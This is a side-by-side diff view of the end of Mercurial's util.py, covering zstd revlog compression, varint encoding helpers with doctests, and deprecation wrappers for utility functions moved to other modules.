3843 def decompressorreader(self, fh):
3846 zstd = self._module
3844 zstd = self._module
3847 dctx = zstd.ZstdDecompressor()
3845 dctx = zstd.ZstdDecompressor()
3848 return chunkbuffer(dctx.read_from(fh))
3846 return chunkbuffer(dctx.read_from(fh))
3849
3847
3850 class zstdrevlogcompressor(object):
3848 class zstdrevlogcompressor(object):
3851 def __init__(self, zstd, level=3):
3849 def __init__(self, zstd, level=3):
3852 # Writing the content size adds a few bytes to the output. However,
3850 # Writing the content size adds a few bytes to the output. However,
3853 # it allows decompression to be more optimal since we can
3851 # it allows decompression to be more optimal since we can
3854 # pre-allocate a buffer to hold the result.
3852 # pre-allocate a buffer to hold the result.
3855 self._cctx = zstd.ZstdCompressor(level=level,
3853 self._cctx = zstd.ZstdCompressor(level=level,
3856 write_content_size=True)
3854 write_content_size=True)
3857 self._dctx = zstd.ZstdDecompressor()
3855 self._dctx = zstd.ZstdDecompressor()
3858 self._compinsize = zstd.COMPRESSION_RECOMMENDED_INPUT_SIZE
3856 self._compinsize = zstd.COMPRESSION_RECOMMENDED_INPUT_SIZE
3859 self._decompinsize = zstd.DECOMPRESSION_RECOMMENDED_INPUT_SIZE
3857 self._decompinsize = zstd.DECOMPRESSION_RECOMMENDED_INPUT_SIZE
3860
3858
3861 def compress(self, data):
3859 def compress(self, data):
3862 insize = len(data)
3860 insize = len(data)
3863 # Caller handles empty input case.
3861 # Caller handles empty input case.
3864 assert insize > 0
3862 assert insize > 0
3865
3863
3866 if insize < 50:
3864 if insize < 50:
3867 return None
3865 return None
3868
3866
3869 elif insize <= 1000000:
3867 elif insize <= 1000000:
3870 compressed = self._cctx.compress(data)
3868 compressed = self._cctx.compress(data)
3871 if len(compressed) < insize:
3869 if len(compressed) < insize:
3872 return compressed
3870 return compressed
3873 return None
3871 return None
3874 else:
3872 else:
3875 z = self._cctx.compressobj()
3873 z = self._cctx.compressobj()
3876 chunks = []
3874 chunks = []
3877 pos = 0
3875 pos = 0
3878 while pos < insize:
3876 while pos < insize:
3879 pos2 = pos + self._compinsize
3877 pos2 = pos + self._compinsize
3880 chunk = z.compress(data[pos:pos2])
3878 chunk = z.compress(data[pos:pos2])
3881 if chunk:
3879 if chunk:
3882 chunks.append(chunk)
3880 chunks.append(chunk)
3883 pos = pos2
3881 pos = pos2
3884 chunks.append(z.flush())
3882 chunks.append(z.flush())
3885
3883
3886 if sum(map(len, chunks)) < insize:
3884 if sum(map(len, chunks)) < insize:
3887 return ''.join(chunks)
3885 return ''.join(chunks)
3888 return None
3886 return None
3889
3887
3890 def decompress(self, data):
3888 def decompress(self, data):
3891 insize = len(data)
3889 insize = len(data)
3892
3890
3893 try:
3891 try:
3894 # This was measured to be faster than other streaming
3892 # This was measured to be faster than other streaming
3895 # decompressors.
3893 # decompressors.
3896 dobj = self._dctx.decompressobj()
3894 dobj = self._dctx.decompressobj()
3897 chunks = []
3895 chunks = []
3898 pos = 0
3896 pos = 0
3899 while pos < insize:
3897 while pos < insize:
3900 pos2 = pos + self._decompinsize
3898 pos2 = pos + self._decompinsize
3901 chunk = dobj.decompress(data[pos:pos2])
3899 chunk = dobj.decompress(data[pos:pos2])
3902 if chunk:
3900 if chunk:
3903 chunks.append(chunk)
3901 chunks.append(chunk)
3904 pos = pos2
3902 pos = pos2
3905 # Frame should be exhausted, so no finish() API.
3903 # Frame should be exhausted, so no finish() API.
3906
3904
3907 return ''.join(chunks)
3905 return ''.join(chunks)
3908 except Exception as e:
3906 except Exception as e:
3909 raise error.RevlogError(_('revlog decompress error: %s') %
3907 raise error.RevlogError(_('revlog decompress error: %s') %
3910 stringutil.forcebytestr(e))
3908 stringutil.forcebytestr(e))
3911
3909
3912 def revlogcompressor(self, opts=None):
3910 def revlogcompressor(self, opts=None):
3913 opts = opts or {}
3911 opts = opts or {}
3914 return self.zstdrevlogcompressor(self._module,
3912 return self.zstdrevlogcompressor(self._module,
3915 level=opts.get('level', 3))
3913 level=opts.get('level', 3))
3916
3914
3917 compengines.register(_zstdengine())
3915 compengines.register(_zstdengine())
3918
3916
3919 def bundlecompressiontopics():
3917 def bundlecompressiontopics():
3920 """Obtains a list of available bundle compressions for use in help."""
3918 """Obtains a list of available bundle compressions for use in help."""
3921 # help.makeitemsdocs() expects a dict of names to items with a .__doc__.
3919 # help.makeitemsdocs() expects a dict of names to items with a .__doc__.
3922 items = {}
3920 items = {}
3923
3921
3924 # We need to format the docstring. So use a dummy object/type to hold it
3922 # We need to format the docstring. So use a dummy object/type to hold it
3925 # rather than mutating the original.
3923 # rather than mutating the original.
3926 class docobject(object):
3924 class docobject(object):
3927 pass
3925 pass
3928
3926
3929 for name in compengines:
3927 for name in compengines:
3930 engine = compengines[name]
3928 engine = compengines[name]
3931
3929
3932 if not engine.available():
3930 if not engine.available():
3933 continue
3931 continue
3934
3932
3935 bt = engine.bundletype()
3933 bt = engine.bundletype()
3936 if not bt or not bt[0]:
3934 if not bt or not bt[0]:
3937 continue
3935 continue
3938
3936
3939 doc = pycompat.sysstr('``%s``\n %s') % (
3937 doc = pycompat.sysstr('``%s``\n %s') % (
3940 bt[0], engine.bundletype.__doc__)
3938 bt[0], engine.bundletype.__doc__)
3941
3939
3942 value = docobject()
3940 value = docobject()
3943 value.__doc__ = doc
3941 value.__doc__ = doc
3944 value._origdoc = engine.bundletype.__doc__
3942 value._origdoc = engine.bundletype.__doc__
3945 value._origfunc = engine.bundletype
3943 value._origfunc = engine.bundletype
3946
3944
3947 items[bt[0]] = value
3945 items[bt[0]] = value
3948
3946
3949 return items
3947 return items
3950
3948
3951 i18nfunctions = bundlecompressiontopics().values()
3949 i18nfunctions = bundlecompressiontopics().values()
3952
3950
3953 # convenient shortcut
3951 # convenient shortcut
3954 dst = debugstacktrace
3952 dst = debugstacktrace
3955
3953
3956 def safename(f, tag, ctx, others=None):
3954 def safename(f, tag, ctx, others=None):
3957 """
3955 """
3958 Generate a name that it is safe to rename f to in the given context.
3956 Generate a name that it is safe to rename f to in the given context.
3959
3957
3960 f: filename to rename
3958 f: filename to rename
3961 tag: a string tag that will be included in the new name
3959 tag: a string tag that will be included in the new name
3962 ctx: a context, in which the new name must not exist
3960 ctx: a context, in which the new name must not exist
3963 others: a set of other filenames that the new name must not be in
3961 others: a set of other filenames that the new name must not be in
3964
3962
3965 Returns a file name of the form oldname~tag[~number] which does not exist
3963 Returns a file name of the form oldname~tag[~number] which does not exist
3966 in the provided context and is not in the set of other names.
3964 in the provided context and is not in the set of other names.
3967 """
3965 """
3968 if others is None:
3966 if others is None:
3969 others = set()
3967 others = set()
3970
3968
3971 fn = '%s~%s' % (f, tag)
3969 fn = '%s~%s' % (f, tag)
3972 if fn not in ctx and fn not in others:
3970 if fn not in ctx and fn not in others:
3973 return fn
3971 return fn
3974 for n in itertools.count(1):
3972 for n in itertools.count(1):
3975 fn = '%s~%s~%s' % (f, tag, n)
3973 fn = '%s~%s~%s' % (f, tag, n)
3976 if fn not in ctx and fn not in others:
3974 if fn not in ctx and fn not in others:
3977 return fn
3975 return fn
3978
3976
3979 def readexactly(stream, n):
3977 def readexactly(stream, n):
3980 '''read n bytes from stream.read and abort if less was available'''
3978 '''read n bytes from stream.read and abort if less was available'''
3981 s = stream.read(n)
3979 s = stream.read(n)
3982 if len(s) < n:
3980 if len(s) < n:
3983 raise error.Abort(_("stream ended unexpectedly"
3981 raise error.Abort(_("stream ended unexpectedly"
3984 " (got %d bytes, expected %d)")
3982 " (got %d bytes, expected %d)")
3985 % (len(s), n))
3983 % (len(s), n))
3986 return s
3984 return s
3987
3985
3988 def uvarintencode(value):
3986 def uvarintencode(value):
3989 """Encode an unsigned integer value to a varint.
3987 """Encode an unsigned integer value to a varint.
3990
3988
3991 A varint is a variable length integer of 1 or more bytes. Each byte
3989 A varint is a variable length integer of 1 or more bytes. Each byte
3992 except the last has the most significant bit set. The lower 7 bits of
3990 except the last has the most significant bit set. The lower 7 bits of
3993 each byte store the 2's complement representation, least significant group
3991 each byte store the 2's complement representation, least significant group
3994 first.
3992 first.
3995
3993
3996 >>> uvarintencode(0)
3994 >>> uvarintencode(0)
3997 '\\x00'
3995 '\\x00'
3998 >>> uvarintencode(1)
3996 >>> uvarintencode(1)
3999 '\\x01'
3997 '\\x01'
4000 >>> uvarintencode(127)
3998 >>> uvarintencode(127)
4001 '\\x7f'
3999 '\\x7f'
4002 >>> uvarintencode(1337)
4000 >>> uvarintencode(1337)
4003 '\\xb9\\n'
4001 '\\xb9\\n'
4004 >>> uvarintencode(65536)
4002 >>> uvarintencode(65536)
4005 '\\x80\\x80\\x04'
4003 '\\x80\\x80\\x04'
4006 >>> uvarintencode(-1)
4004 >>> uvarintencode(-1)
4007 Traceback (most recent call last):
4005 Traceback (most recent call last):
4008 ...
4006 ...
4009 ProgrammingError: negative value for uvarint: -1
4007 ProgrammingError: negative value for uvarint: -1
4010 """
4008 """
4011 if value < 0:
4009 if value < 0:
4012 raise error.ProgrammingError('negative value for uvarint: %d'
4010 raise error.ProgrammingError('negative value for uvarint: %d'
4013 % value)
4011 % value)
4014 bits = value & 0x7f
4012 bits = value & 0x7f
4015 value >>= 7
4013 value >>= 7
4016 bytes = []
4014 bytes = []
4017 while value:
4015 while value:
4018 bytes.append(pycompat.bytechr(0x80 | bits))
4016 bytes.append(pycompat.bytechr(0x80 | bits))
4019 bits = value & 0x7f
4017 bits = value & 0x7f
4020 value >>= 7
4018 value >>= 7
4021 bytes.append(pycompat.bytechr(bits))
4019 bytes.append(pycompat.bytechr(bits))
4022
4020
4023 return ''.join(bytes)
4021 return ''.join(bytes)
4024
4022
4025 def uvarintdecodestream(fh):
4023 def uvarintdecodestream(fh):
4026 """Decode an unsigned variable length integer from a stream.
4024 """Decode an unsigned variable length integer from a stream.
4027
4025
4028 The passed argument is anything that has a ``.read(N)`` method.
4026 The passed argument is anything that has a ``.read(N)`` method.
4029
4027
4030 >>> try:
4028 >>> try:
4031 ... from StringIO import StringIO as BytesIO
4029 ... from StringIO import StringIO as BytesIO
4032 ... except ImportError:
4030 ... except ImportError:
4033 ... from io import BytesIO
4031 ... from io import BytesIO
4034 >>> uvarintdecodestream(BytesIO(b'\\x00'))
4032 >>> uvarintdecodestream(BytesIO(b'\\x00'))
4035 0
4033 0
4036 >>> uvarintdecodestream(BytesIO(b'\\x01'))
4034 >>> uvarintdecodestream(BytesIO(b'\\x01'))
4037 1
4035 1
4038 >>> uvarintdecodestream(BytesIO(b'\\x7f'))
4036 >>> uvarintdecodestream(BytesIO(b'\\x7f'))
4039 127
4037 127
4040 >>> uvarintdecodestream(BytesIO(b'\\xb9\\n'))
4038 >>> uvarintdecodestream(BytesIO(b'\\xb9\\n'))
4041 1337
4039 1337
4042 >>> uvarintdecodestream(BytesIO(b'\\x80\\x80\\x04'))
4040 >>> uvarintdecodestream(BytesIO(b'\\x80\\x80\\x04'))
4043 65536
4041 65536
4044 >>> uvarintdecodestream(BytesIO(b'\\x80'))
4042 >>> uvarintdecodestream(BytesIO(b'\\x80'))
4045 Traceback (most recent call last):
4043 Traceback (most recent call last):
4046 ...
4044 ...
4047 Abort: stream ended unexpectedly (got 0 bytes, expected 1)
4045 Abort: stream ended unexpectedly (got 0 bytes, expected 1)
4048 """
4046 """
4049 result = 0
4047 result = 0
4050 shift = 0
4048 shift = 0
4051 while True:
4049 while True:
4052 byte = ord(readexactly(fh, 1))
4050 byte = ord(readexactly(fh, 1))
4053 result |= ((byte & 0x7f) << shift)
4051 result |= ((byte & 0x7f) << shift)
4054 if not (byte & 0x80):
4052 if not (byte & 0x80):
4055 return result
4053 return result
4056 shift += 7
4054 shift += 7
4057
4055
4058 ###
4056 ###
4059 # Deprecation warnings for util.py splitting
4057 # Deprecation warnings for util.py splitting
4060 ###
4058 ###
4061
4059
4062 def _deprecatedfunc(func, version):
4060 def _deprecatedfunc(func, version):
4063 def wrapped(*args, **kwargs):
4061 def wrapped(*args, **kwargs):
4064 fn = pycompat.sysbytes(func.__name__)
4062 fn = pycompat.sysbytes(func.__name__)
4065 mn = pycompat.sysbytes(func.__module__)[len('mercurial.'):]
4063 mn = pycompat.sysbytes(func.__module__)[len('mercurial.'):]
4066 msg = "'util.%s' is deprecated, use '%s.%s'" % (fn, mn, fn)
4064 msg = "'util.%s' is deprecated, use '%s.%s'" % (fn, mn, fn)
4067 nouideprecwarn(msg, version)
4065 nouideprecwarn(msg, version)
4068 return func(*args, **kwargs)
4066 return func(*args, **kwargs)
4069 wrapped.__name__ = func.__name__
4067 wrapped.__name__ = func.__name__
4070 return wrapped
4068 return wrapped
4071
4069
4072 defaultdateformats = dateutil.defaultdateformats
4070 defaultdateformats = dateutil.defaultdateformats
4073 extendeddateformats = dateutil.extendeddateformats
4071 extendeddateformats = dateutil.extendeddateformats
4074 makedate = _deprecatedfunc(dateutil.makedate, '4.6')
4072 makedate = _deprecatedfunc(dateutil.makedate, '4.6')
4075 datestr = _deprecatedfunc(dateutil.datestr, '4.6')
4073 datestr = _deprecatedfunc(dateutil.datestr, '4.6')
4076 shortdate = _deprecatedfunc(dateutil.shortdate, '4.6')
4074 shortdate = _deprecatedfunc(dateutil.shortdate, '4.6')
4077 parsetimezone = _deprecatedfunc(dateutil.parsetimezone, '4.6')
4075 parsetimezone = _deprecatedfunc(dateutil.parsetimezone, '4.6')
4078 strdate = _deprecatedfunc(dateutil.strdate, '4.6')
4076 strdate = _deprecatedfunc(dateutil.strdate, '4.6')
4079 parsedate = _deprecatedfunc(dateutil.parsedate, '4.6')
4077 parsedate = _deprecatedfunc(dateutil.parsedate, '4.6')
4080 matchdate = _deprecatedfunc(dateutil.matchdate, '4.6')
4078 matchdate = _deprecatedfunc(dateutil.matchdate, '4.6')
4081
4079
4082 escapedata = _deprecatedfunc(stringutil.escapedata, '4.6')
4080 escapedata = _deprecatedfunc(stringutil.escapedata, '4.6')
4083 binary = _deprecatedfunc(stringutil.binary, '4.6')
4081 binary = _deprecatedfunc(stringutil.binary, '4.6')
4084 stringmatcher = _deprecatedfunc(stringutil.stringmatcher, '4.6')
4082 stringmatcher = _deprecatedfunc(stringutil.stringmatcher, '4.6')
4085 shortuser = _deprecatedfunc(stringutil.shortuser, '4.6')
4083 shortuser = _deprecatedfunc(stringutil.shortuser, '4.6')
4086 emailuser = _deprecatedfunc(stringutil.emailuser, '4.6')
4084 emailuser = _deprecatedfunc(stringutil.emailuser, '4.6')
4087 email = _deprecatedfunc(stringutil.email, '4.6')
4085 email = _deprecatedfunc(stringutil.email, '4.6')
4088 ellipsis = _deprecatedfunc(stringutil.ellipsis, '4.6')
4086 ellipsis = _deprecatedfunc(stringutil.ellipsis, '4.6')
4089 escapestr = _deprecatedfunc(stringutil.escapestr, '4.6')
4087 escapestr = _deprecatedfunc(stringutil.escapestr, '4.6')
4090 unescapestr = _deprecatedfunc(stringutil.unescapestr, '4.6')
4088 unescapestr = _deprecatedfunc(stringutil.unescapestr, '4.6')
4091 forcebytestr = _deprecatedfunc(stringutil.forcebytestr, '4.6')
4089 forcebytestr = _deprecatedfunc(stringutil.forcebytestr, '4.6')
4092 uirepr = _deprecatedfunc(stringutil.uirepr, '4.6')
4090 uirepr = _deprecatedfunc(stringutil.uirepr, '4.6')
4093 wrap = _deprecatedfunc(stringutil.wrap, '4.6')
4091 wrap = _deprecatedfunc(stringutil.wrap, '4.6')
4094 parsebool = _deprecatedfunc(stringutil.parsebool, '4.6')
4092 parsebool = _deprecatedfunc(stringutil.parsebool, '4.6')
General Comments 0
You need to be logged in to leave comments. Login now